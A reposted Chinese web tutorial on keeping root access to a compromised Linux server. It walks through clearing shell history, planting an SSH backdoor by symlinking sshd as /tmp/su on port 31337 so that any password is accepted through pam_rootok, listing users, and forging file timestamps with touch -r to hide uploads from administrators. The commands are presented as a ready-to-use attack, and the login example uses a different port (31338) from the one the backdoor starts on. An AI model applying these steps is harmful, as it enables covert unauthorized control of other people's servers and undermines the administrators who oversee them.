加入收藏 | 设为首页 | 会员中心 | 我要投稿 李大同 (https://www.lidatong.com.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 综合聚焦 > 服务器 > Linux > 正文

SSH 维持权限(好用)

发布时间:2020-12-14 00:46:16 所属栏目:Linux 来源:网络整理
导读:很多时候我们拿下机器后需要维持权限,在计划任务上加入定时反弹shell这很容易被 运维人员发现,有些场景没必要用到rootkit级别的后门,我们可以尝试使用ssh后门 ? 1.目的 长期维持机器root权限,同时后门有需要躲避管理检测 通信隐蔽、自启动项隐藏、文件隐

很多时候我们拿下机器后需要维持权限,在计划任务上加入定时反弹shell这很容易被 运维人员发现,有些场景没必要用到rootkit级别的后门,我们可以尝试使用ssh后门

?

1.目的

长期维持机器root权限,同时后门有需要躲避管理检测
通信隐蔽、自启动项隐藏、文件隐藏、进程/模块隐藏、注册表隐藏、服务隐藏、端口隐藏等

SSH命令痕迹清除,登陆之后先执行

unset HISTFILE;export HISTFILESIZE=0;export HISTIGNORE=*;export HISTCONTROL=ignorespace

每次输入命令前加上空格即可不再history中记录命令

2.后门方式
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337
3.使用使用任意密码登录系统后门
ssh root:[email?protected] -p 31338
4.查看存在哪些用户
cat /etc/passwd|grep -v nologin|grep -v halt|grep -v shutdown|awk -F":" { print $1"|"$3"|"$4 }|more
1 # 如下
2 root|0|0
3 sync|4|65534
4 mysql|104|109
5 postgres|113|117
6 arpwatch|117|120
7 Debian-snmp|118|123
8 speech-dispatcher|127|29
9 Debian-gdm|130|138
5.修改上传文件时间戳

touch -r 老文件时间戳 新文件时间戳

6.退出ssh
exit
?注

0.任意密码登陆的核心是auth sufficient pam_rootok.so,只要PAM配置文件中包含此配置即可SSH任意密码登陆,实践表明,可成功利用的PAM配置文件除了su还有chsh、chfn1.前提linux软连接连接ssh后门需要ssh配置允许PAM认证才能使用2.被控主机不允许root登录,可用其他已存在用户登录

(编辑:李大同)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

    推荐文章
      热点阅读